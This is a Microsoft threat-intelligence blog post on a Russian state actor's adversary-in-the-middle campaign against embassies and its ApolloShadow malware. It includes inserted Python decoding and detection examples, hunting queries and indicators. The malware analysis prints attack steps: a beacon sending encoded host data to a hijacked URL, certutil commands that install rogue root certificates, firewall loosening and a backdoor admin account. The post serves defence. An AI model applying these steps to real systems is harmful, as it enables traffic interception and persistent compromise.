Sunday, August 3, 2025

Frozen in transit: Secret Blizzard's AiTM campaign against diplomats

Microsoft Threat Intelligence has uncovered a cyberespionage campaign by the Russian state actor we track as Secret Blizzard that has been targeting embassies located in Moscow using an adversary-in-the-middle (AiTM) position to deploy their custom ApolloShadow malware. ApolloShadow has the capability to install a trusted root certificate to trick devices into trusting malicious actor-controlled sites, enabling Secret Blizzard to maintain persistence on diplomatic devices, likely for intelligence collection. This campaign, which has been ongoing since at least 2024, poses a high risk to foreign embassies, diplomatic entities, and other sensitive organizations operating in Moscow, particularly to those entities who rely on local internet providers.

While we previously assessed with low confidence that the actor conducts cyberespionage activities within Russian borders against foreign and domestic entities, this is the first time we can confirm that they have the capability to do so at the Internet Service Provider (ISP) level. This means that diplomatic personnel using local ISP or telecommunications services in Russia are highly likely targets of Secret Blizzard's AiTM position within those services. In our previous blog, we reported the actor likely leverages Russia's domestic intercept systems such as the System for Operative Investigative Activities (SORM), which we assess may be integral in facilitating the actor's current AiTM activity, judging from the large-scale nature of these operations.

This blog provides guidance on how organizations can defend against Secret Blizzard's AiTM ApolloShadow campaign, including forcing or routing all traffic through an encrypted tunnel to a trusted network or using an alternate provider, such as a satellite-based connection, hosted within a country that does not control or influence the provider's infrastructure. The blog also provides additional information on network defense, such as recommendations, indicators of compromise (IOCs), and detection details.

Secret Blizzard is attributed by the United States Cybersecurity and Infrastructure Security Agency (CISA) as Russian Federal Security Service (Center 16). Secret Blizzard further overlaps with threat actors tracked by other security vendors by names such as VENOMOUS BEAR, Uroburos, Snake, Blue Python, Turla, Wraith, ATG26, and Waterbug.

As part of our continuous monitoring, analysis, and reporting of the threat landscape, we are sharing our observations on Secret Blizzard's latest activity to raise awareness of this actor's tradecraft and educate organizations on how to harden their attack surface against this and similar activity. Although this activity poses a high risk to entities within Russia, the defense measures included in this blog are broadly applicable and can help organizations in any region reduce their risk from similar threats. Microsoft is also tracking other groups using similar techniques, including those documented by ESET in a previous publication.

AiTM and ApolloShadow deployment

In February 2025, Microsoft Threat Intelligence observed Secret Blizzard conducting a cyberespionage campaign against foreign embassies located in Moscow, Russia, using an AiTM position to deploy the ApolloShadow malware to maintain persistence and collect intelligence from diplomatic entities. An adversary-in-the-middle technique is when an adversary positions themselves between two or more networks to support follow-on activity. The Secret Blizzard AiTM position is likely facilitated by lawful intercept and notably includes the installation of root certificates under the guise of Kaspersky Anti-Virus (AV). We assess this allows for TLS/SSL stripping from the Secret Blizzard AiTM position, rendering the majority of the target's browsing in clear text along with the delivery of certain tokens and credentials. Secret Blizzard has exhibited similar techniques in past cyberespionage campaigns to infect foreign ministries in Eastern Europe by tricking users into downloading a trojanized Flash installer from an AiTM position.

Initial access

In this most recent campaign, the initial access mechanism used by Secret Blizzard is facilitated by an AiTM position at the ISP/Telco level within Russia, through which the actor redirects target devices by placing them behind a captive portal. Captive portals are legitimate web pages designed to manage network access, such as those encountered when connecting to the internet at a hotel or airport. Once behind a captive portal, the Windows Test Connectivity Status Indicator is initiated, a legitimate service that determines whether a device has internet access by sending an HTTP GET request to hxxp://www.msftconnecttest[.]com/redirect, which should direct to msn[.]com.

Delivery and installation

Once the system opens the browser window to this address, the system is redirected to a separate actor-controlled domain that likely displays a certificate validation error which prompts the target to download and execute ApolloShadow. Following execution, ApolloShadow checks the privilege level of the ProcessToken and, if the machine is not running on default administrative settings, the malware displays the user access control (UAC) pop-up window to prompt the user to install certificates with the file name CertificateDB.exe, which masquerades as a Kaspersky installer to install root certificates and allow the actor to gain elevated privileges on the system.

The infection chain reflects the back and forth between the unknowing target and Secret Blizzard, with the target first getting an unexpected response to a connection, leading the attacker to redirect the target to their domain. The target downloads and executes the malware, which ultimately beacons the attacker's server at their attacker-controlled IP address to deliver a secondary payload.
Figure 1. Secret Blizzard AiTM infection chain

ApolloShadow malware

ApolloShadow uses two execution paths depending on the privilege level of the running process. The token of the running process is retrieved using the API GetTokenInformationType and the value of TokenInformation is checked to see if the token contains the TokenElevationTypeFull type. If it does not have that privilege level, ApolloShadow executes a low privilege execution path.

Diagram of the ApolloShadow execution flow starting with CertificateDB.exe checking token access, using a GET request to receive and execute the VB Script. At the same time, it installs the certificate to elevate privileges, ultimately installing root certificates, changing the connected networks to private, and adding an admin user.
Figure 2. ApolloShadow execution flow

Low privilege execution

When executing the low privilege path, the first action is to collect information about the host to send back to the AiTM-controlled command and control (C2). First, the host's IP information is collected using the API GetIpAddrTable, which collects information from the IpAddrTable. Each entry is individually Base64-encoded and delineated by a pipe character with \r\n appended, then combined into one string. For example:

  • 172.29.162[.]128 00-15-5D-04-04-1C
  • 127.0.0[.]1

 "|MTcyLjI5LjE2Mi4xMjggMDAtMTUtNUQtMDQtMDQtMUM=|\r\n|MTI3LjAuMC4xIA==|\r\n"

 Then the entire string is Base64-encoded once again in preparation for exfiltration to the C2 host:

"fE1UY3lMakk1TGpFMk1pNHhNamdnTURBdE1UVXROVVF0TURRdE1EUXRNVU09fA0KfE1USTNMakF1TUM0eElBPT18DQo="

The encoded network information is added as a query string to a GET request with the destination URL hxxp://timestamp.digicert[.]com/registered. Two query parameters are included with the request, code and t. The code parameter contains a hardcoded set of characters and the t variable has the encoded IP address information, as shown below:

code=DQBBBBBBBBBOBBBBBBBBBBgBBBBBBBBBny_t???????t=fE1UY3lMakk1TGpFMk1pNHhNamdnTURBdE1UVXROVVF0TURRdE1EUXRNVU09fA0KfE1USTNMakF1TUM0eElBPT18DQo=

While the timestamp subdomain does exist for Digicert, the /registered resource does not. Due to the AiTM position of the actor, Secret Blizzard can use DNS manipulation to redirect legitimate-looking communication to the actor-controlled C2 and return an encoded VBScript as the second-stage payload.
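As an added example (not code from the blog and not the malware's own code), the following Python reproduces the nested Base64 scheme described above so an analyst can decode a captured t parameter back into the IpAddrTable entries, and re-encode entries to confirm the layout. It assumes the "<ip> <mac>" entry layout inferred from the two example values (the loopback entry has no adapter address, which is why its decoded form ends in a space), and a standard "&" separator between the code and t parameters when parsing a full query string; the code value in the sample query is a placeholder, not the hardcoded value from the sample.

```python
"""Decoder/encoder for the ApolloShadow host-information beacon format.

Added example, not Microsoft's code or the malware's: it mirrors the scheme
the blog documents (Base64 per IpAddrTable entry, joined as |<b64>|\r\n, then
Base64 once more to form the ``t`` query parameter).
"""
import base64

_CRLF = "\r\n"


def encode_entries(entries):
    """Build the outer Base64 string from (ip, mac) tuples.

    The "<ip> <mac>" layout is inferred from the blog's example values; a mac
    of "" reproduces the trailing space seen on the 127.0.0.1 entry.
    """
    inner = ""
    for ip, mac in entries:
        raw = f"{ip} {mac}".encode("ascii")
        inner += "|" + base64.b64encode(raw).decode("ascii") + "|" + _CRLF
    return base64.b64encode(inner.encode("ascii")).decode("ascii")


def decode_t_param(t_value):
    """Reverse the scheme: outer Base64 -> split on pipes -> inner Base64."""
    inner = base64.b64decode(t_value, validate=True).decode("ascii")
    entries = []
    for chunk in inner.split("|"):
        chunk = chunk.strip()  # drops the "\r\n" separators and empty pieces
        if not chunk:
            continue
        entries.append(base64.b64decode(chunk, validate=True).decode("ascii").strip())
    return entries


def decode_beacon_query(query):
    """Pull ``t`` out of a captured query string and decode it.

    Assumes a conventional "&"-separated query; no percent-decoding is done so
    that Base64 padding and '+' characters survive untouched.
    """
    params = {}
    for pair in query.split("&"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            params[key] = value
    if "t" not in params:
        raise ValueError("no t parameter in beacon query")
    return decode_t_param(params["t"])


# Constructed sample input, taken from the blog's worked example values.
SAMPLE_ENTRIES = [("172.29.162.128", "00-15-5D-04-04-1C"), ("127.0.0.1", "")]
SAMPLE_T = (
    "fE1UY3lMakk1TGpFMk1pNHhNamdnTURBdE1UVXROVVF0TURRdE1EUXRNVU09fA0K"
    "fE1USTNMakF1TUM0eElBPT18DQo="
)
# The real hardcoded code value is not reproduced here; this is a placeholder.
SAMPLE_QUERY = "code=CODE_PLACEHOLDER&t=" + SAMPLE_T

if __name__ == "__main__":
    print(decode_beacon_query(SAMPLE_QUERY))
    print(encode_entries(SAMPLE_ENTRIES) == SAMPLE_T)
```

Running the block decodes the sample t value to the two host entries and confirms that re-encoding them reproduces the blog's outer string byte for byte, which is a useful check that a captured beacon really follows this format rather than merely looking like Base64.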

When the response comes back from the redirected Digicert request, the file name that is used to write the script to disk is decoded for use. ApolloShadow uses string obfuscation in several places throughout the binary to hide important strings. These strings are blocks of encoded characters that are encoded using XOR with a separate set of hardcoded constants. While this is not a particularly sophisticated technique, it is enough to obscure the strings from view at first glance. The strings are decoded as they are used and then re-encoded after use to remove traces of the strings from memory.

Screenshot of code depicting the string decoding operation for the VB script name
Figure 2. String decoding operation for VB script name

The decoded file name is edgB4ACD.vbs and the file name string is concatenated by the malware with the result of querying the environment variable for the TEMP directory to create the path for the target script. We were unable to recover the script, but the header of the response is checked for the first 12 characters to see if it matches the string MDERPWSAB64B. Once ApolloShadow has properly decoded the script, it executes the script using the Windows API call CreateProcessW with the command line to launch wscript and the path to edgB4ACD.vbs.

Finally, the ApolloShadow process launches itself again using ShellExecuteA, which presents the user with a UAC window to bypass UAC mechanisms and prompt the user to grant the malware the highest privileges available to the user.

Screenshot of the UAC popup which asks the user if they want to allow this app from an unknown publisher to make changes to their device. The file is called CertificateDB.exe and the user can click Yes or No.
Figure 3. UAC popup to request elevated privileges from the user

Elevated privilege execution

When the process is executed with sufficient elevated privileges, ApolloShadow alters the host by setting all networks to Private. This induces several changes, including allowing the host machine to become discoverable and relaxing firewall rules to permit file sharing. While we did not see any direct attempts at lateral movement, the main reason for these changes is likely to reduce the difficulty of lateral movement on the network. ApolloShadow uses two different methods to perform this change.

The first method is through the registry settings for NetworkProfiles: SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles. The network's globally unique identifiers (GUIDs) are parsed for each connected network, and the malware modifies the value Category by setting it to 0. This change sets the profile of the network to Private after the host has been rebooted.

Screenshot of the registry settings for network profiles
Figure 4. Registry settings for network profiles

The second method directly sets firewall rules using Component Object Model (COM) objects that enable file sharing and turn on network discovery. Several strings are decoded using the same method as above and concatenated to create the firewall rules they want to modify.

  • FirewallAPI.dll,-32752
    • This command enables the Network Discovery rule group
  • FirewallAPI.dll,-28502
    • This command enables all rules in the File and Printer Sharing group

The strings are passed to the COM objects to enable the rules if they are not already enabled.

Screenshot of code depicting COM objects that were used to modify firewall rules
Figure 5. COM objects used to modify firewall rules

Both methods have some crossover, but the following table provides a comparison overview of each method.

Method | Purpose | Timing | Stealth | Effect
Registry profile change | Sets network to Private | Requires reboot | High | Broadly relaxes firewall posture
COM-based rule enablement | Activates specific rules | Immediate | Moderate | Opens precise ports for discovery and sharing

From here, ApolloShadow presents the user with a window showing that the certificates are being installed.

A screenshot of the window displayed to the user which shows a loading bar called K Certificate Installation
Figure 6. Window displayed to the user during execution

A new thread performs the rest of the functionality. The two root certificates being installed are written to the %TEMP% directory with a temporary name and the extension crt. The certificate installation is performed by using the Windows certutil utility, and the temporary files are deleted following the execution of the commands (the user name in the paths below is a placeholder):

  • certutil.exe -f -Enterprise -addstore root "C:\Users\<username>\AppData\Local\Temp\crt3C5C.tmp"
  • certutil.exe -f -Enterprise -addstore ca "C:\Users\<username>\AppData\Local\Temp\crt53FF.tmp"

The malware must add a preference file to the Firefox preference directory because Firefox uses different certificate stores than browsers such as Chromium, which results in Firefox not trusting the root and enterprise stores by default. ApolloShadow reads the registry key that points to the installation of the application and builds a path to the preference directory from there. A file is written to disk called wincert.js containing a preference modification for Firefox browsers, allowing Firefox to trust the root certificates added to the operating system's certificate store.

  • pref("security.enterprise_roots.enabled", true);

The final step is to create an administrative user with the username UpdatusUser and a hardcoded password on the infected system using the Windows API NetUserAdd. The password is also set to never expire.

Screenshot of an admin user being added to an infected system with the username UpdatusUser
Figure 7. Administrator user added to infected system

ApolloShadow has successfully installed itself on the infected host and has persistent access using the new local administrator user.
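As an added example (not Microsoft's detection logic and not code from the blog), the following Python runs a small set of host-artifact rules over constructed, Defender-style endpoint events covering the elevated-path behaviours described above: the certutil -Enterprise -addstore commands operating on a file in a Temp directory, wscript launching a .vbs from Temp, the wincert.js preference file, a Category write under NetworkList\Profiles, and creation of the UpdatusUser account. The event field names (ActionType, ProcessCommandLine, FileName, FolderPath, RegistryKey, RegistryValueName, AccountName, DeviceId, ReportId), the Firefox folder, the user name in the paths and the profile GUID are assumptions or placeholders; all sample events are constructed, including the two benign ones used to show the rules do not fire on ordinary certutil and wscript use.

```python
"""Host-artifact rules for the ApolloShadow elevated execution path.

Added example, not Microsoft's detection content. Events are dicts using
Defender-style field names (assumed here); scoring counts how many distinct
artifacts appear on one device, since the combination is the strong signal.
"""
import re

# A path under a user's local Temp folder, as in the blog's certutil commands.
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.IGNORECASE)


def _cmd(ev):
    return ev.get("ProcessCommandLine", "")


def rule_certutil_enterprise_root(ev):
    """certutil -Enterprise -addstore root|ca with a source file in Temp."""
    c = _cmd(ev)
    return (ev.get("ActionType") == "ProcessCreated"
            and re.search(r"\bcertutil(\.exe)?\b", c, re.I) is not None
            and re.search(r"-addstore\s+(root|ca)\b", c, re.I) is not None
            and re.search(r"-enterprise\b", c, re.I) is not None
            and TEMP_DIR.search(c) is not None)


def rule_wscript_temp_vbs(ev):
    """wscript running a .vbs from a Temp directory (edgB4ACD.vbs in the blog)."""
    c = _cmd(ev)
    return (ev.get("ActionType") == "ProcessCreated"
            and re.search(r"\bwscript(\.exe)?\b", c, re.I) is not None
            and re.search(r'\\temp\\[^\s"]+\.vbs\b', c, re.I) is not None)


def rule_firefox_enterprise_roots_pref(ev):
    """Creation of the wincert.js preference file the blog describes."""
    return (ev.get("ActionType") == "FileCreated"
            and ev.get("FileName", "").lower() == "wincert.js")


def rule_network_profile_category(ev):
    """Category value written under NetworkList\\Profiles\\{GUID}."""
    return (ev.get("ActionType") == "RegistryValueSet"
            and "\\networklist\\profiles\\" in ev.get("RegistryKey", "").lower()
            and ev.get("RegistryValueName", "").lower() == "category")


def rule_local_admin_user_added(ev):
    """Creation of the hardcoded UpdatusUser account."""
    return (ev.get("ActionType") == "UserAccountCreated"
            and ev.get("AccountName", "").lower() == "updatususer")


RULES = [
    ("certutil_enterprise_root", rule_certutil_enterprise_root),
    ("wscript_temp_vbs", rule_wscript_temp_vbs),
    ("firefox_enterprise_roots_pref", rule_firefox_enterprise_roots_pref),
    ("network_profile_category", rule_network_profile_category),
    ("local_admin_user_added", rule_local_admin_user_added),
]


def evaluate(events):
    """Return (rule_name, ReportId) for every rule that fires on an event."""
    return [(name, ev["ReportId"]) for ev in events for name, rule in RULES if rule(ev)]


def score_devices(events):
    """Distinct rules fired per device; several on one host warrants triage."""
    per_device = {}
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                per_device.setdefault(ev["DeviceId"], set()).add(name)
    return {device: len(names) for device, names in per_device.items()}


# Constructed sample telemetry; paths, user name and GUID are placeholders.
TEMP = "C:\\Users\\user\\AppData\\Local\\Temp\\"
SAMPLE_EVENTS = [
    {"ReportId": 1, "DeviceId": "host-a", "ActionType": "ProcessCreated",
     "ProcessCommandLine": f'certutil.exe -f -Enterprise -addstore root "{TEMP}crt3C5C.tmp"'},
    {"ReportId": 2, "DeviceId": "host-a", "ActionType": "ProcessCreated",
     "ProcessCommandLine": f'certutil.exe -f -Enterprise -addstore ca "{TEMP}crt53FF.tmp"'},
    {"ReportId": 3, "DeviceId": "host-a", "ActionType": "ProcessCreated",
     "ProcessCommandLine": f'wscript.exe "{TEMP}edgB4ACD.vbs"'},
    {"ReportId": 4, "DeviceId": "host-a", "ActionType": "FileCreated",
     "FileName": "wincert.js", "FolderPath": "C:\\Program Files\\Mozilla Firefox\\defaults\\pref"},
    {"ReportId": 5, "DeviceId": "host-a", "ActionType": "RegistryValueSet",
     "RegistryKey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
                    "\\NetworkList\\Profiles\\{GUID-PLACEHOLDER}",
     "RegistryValueName": "Category", "RegistryValueData": "0"},
    {"ReportId": 6, "DeviceId": "host-a", "ActionType": "UserAccountCreated",
     "AccountName": "UpdatusUser"},
    # Benign: an administrator importing an internal CA from a share, not Temp.
    {"ReportId": 7, "DeviceId": "host-b", "ActionType": "ProcessCreated",
     "ProcessCommandLine": 'certutil.exe -addstore root "\\\\fileserver\\pki\\corp-root.cer"'},
    # Benign: a logon script outside any Temp directory.
    {"ReportId": 8, "DeviceId": "host-b", "ActionType": "ProcessCreated",
     "ProcessCommandLine": 'wscript.exe "C:\\Scripts\\logon.vbs"'},
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
    print(score_devices(SAMPLE_EVENTS))
```

On the sample, all five rules fire on host-a and none on host-b; the per-device count is what an analyst would alert on, since any single one of these artifacts (a certutil import, a Category change, a new local account) can also occur legitimately.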

Defending against Secret Blizzard activity

Microsoft recommends that all customers, but especially sensitive organizations operating in Moscow, implement the following recommendation to mitigate against Secret Blizzard activity.

  • Route all traffic through an encrypted tunnel to a trusted network or use a virtual private network (VPN) service provider, such as a satellite-based provider, whose infrastructure is not controlled or influenced by outside parties.

Microsoft also recommends the following guidance to enhance security and mitigate potential threats:

  • Practice the principle of least privilege, use multifactor authentication (MFA), and audit privileged account activity in your environments to slow and stop attackers. Avoid the use of domain-wide, admin-level service accounts and restrict local administrative privileges. These mitigation steps reduce the paths that attackers have available to them to accomplish their objectives and lower the risk of the compromise spreading in your environment.
  • Regularly review highly privileged groups like Administrators, Remote Desktop Users, and Enterprise Admins. Threat actors may add accounts to these groups to maintain persistence and disguise their activity.
  • Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques.
  • Run endpoint detection and response (EDR) in block mode, so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.
  • Turn on attack surface reduction rules to prevent common attack techniques. These rules, which can be configured by all Microsoft Defender Antivirus customers and not just those using the EDR solution, offer significant hardening against common attack vectors.
    • Block executable files from running unless they meet a prevalence, age, or trusted list criterion
    • Block execution of potentially obfuscated scripts

Microsoft Defender XDR detections

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects this threat as the following malware:

Microsoft Defender for Endpoint

The following alerts might indicate threat activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.

  • Secret Blizzard Actor activity detected
  • Suspicious root certificate installation
  • Suspicious certutil activity
  • User account created under suspicious circumstances
  • A script with suspicious content was observed

Microsoft Security Copilot

Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:

  • Incident investigation
  • Microsoft User analysis
  • Threat actor profile
  • Threat Intelligence 360 report based on MDTI article
  • Vulnerability impact assessment

Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal, to get more information about this threat actor.

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Surface devices that attempt to download a file within two minutes after captive portal redirection. This activity may indicate a first stage AiTM attack, such as the one used by Secret Blizzard, against a device.

  let CaptiveRedirectEvents = DeviceNetworkEvents
  | where RemoteUrl contains "msftconnecttest.com/redirect"
  | project DeviceId, RedirectTimestamp = Timestamp, RemoteUrl;
  let FileDownloadEvents = DeviceFileEvents
  | where ActionType == "FileDownloaded"
  | project DeviceId, DownloadTimestamp = Timestamp, FileName, FolderPath;
  CaptiveRedirectEvents
  | join kind=inner (FileDownloadEvents) on DeviceId
  | where DownloadTimestamp between (RedirectTimestamp .. (RedirectTimestamp + 2m))
  | project DeviceId, RedirectTimestamp, RemoteUrl, DownloadTimestamp, FileName, FolderPath

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with 'TI map') to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Below are the queries using Sentinel Advanced Security Information Model (ASIM) functions to hunt threats across both Microsoft first-party and third-party data sources. ASIM also supports deploying parsers to specific workspaces from GitHub, using an ARM template or manually.

Detect network IP and domain indicators of compromise using ASIM

The below query checks IP addresses and domain indicators of compromise (IOCs) across data sources supported by the ASIM Network Session parser.

  // IP list and domain list - _Im_NetworkSession
  let lookback = 30d;
  let ioc_ip_addr = dynamic(["45.61.149.109"]);
  let ioc_domains = dynamic(["kav-certificates.info"]);
  _Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())
  | where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains)
  | summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor

Detect network and file hash indicators of compromise using ASIM

The below queries will check IP addresses and file hash IOCs across data sources supported by the ASIM Web Session parser.

Detect network indicators of compromise and domains using ASIM

  // IP list - _Im_WebSession
  let lookback = 30d;
  let ioc_ip_addr = dynamic(["45.61.149.109"]);
  let ioc_sha_hashes = dynamic(["13fafb1ae2d5de024e68f2e2fc820bc79ef0690c40dbfd70246bcc394c52ea20"]);
  _Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now())
  | where DstIpAddr in (ioc_ip_addr) or FileSHA256 in (ioc_sha_hashes)
  | summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor

  // Domain list - _Im_WebSession
  let ioc_domains = dynamic(["kav-certificates.info"]);
  _Im_WebSession (url_has_any = ioc_domains)

Detect file hash indicators of compromise using ASIM

The below query will check file hash IOCs across data sources supported by the ASIM FileEvent parser.

Detect network and file hash indicators of compromise using ASIM

  // file hash list - imFileEvent
  let ioc_sha_hashes = dynamic(["13fafb1ae2d5de024e68f2e2fc820bc79ef0690c40dbfd70246bcc394c52ea20"]);
  imFileEvent
  | where SrcFileSHA256 in (ioc_sha_hashes) or TargetFileSHA256 in (ioc_sha_hashes)
  | extend AccountName = tostring(split(User, @'\')[1]), AccountNTDomain = tostring(split(User, @'\')[0])
  | extend AlgorithmType = "SHA256"

Indicators of compromise

Indicator | Type | Description
kav-certificates[.]info | Domain | Actor-controlled domain that downloads the malware
45.61.149[.]109 | IP address | Actor-controlled IP address
13fafb1ae2d5de024e68f2e2fc820bc79ef0690c40dbfd70246bcc394c52ea20 | SHA256 | ApolloShadow malware
CertificateDB.exe | File name | File name associated with ApolloShadow sample

Learn more

Meet the experts behind Microsoft Threat Intelligence, Incident Response, and the Microsoft Security Response Center at our VIP Mixer at Black Hat 2025. Discover how our end-to-end platform can help you strengthen resilience and elevate your security posture.

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.

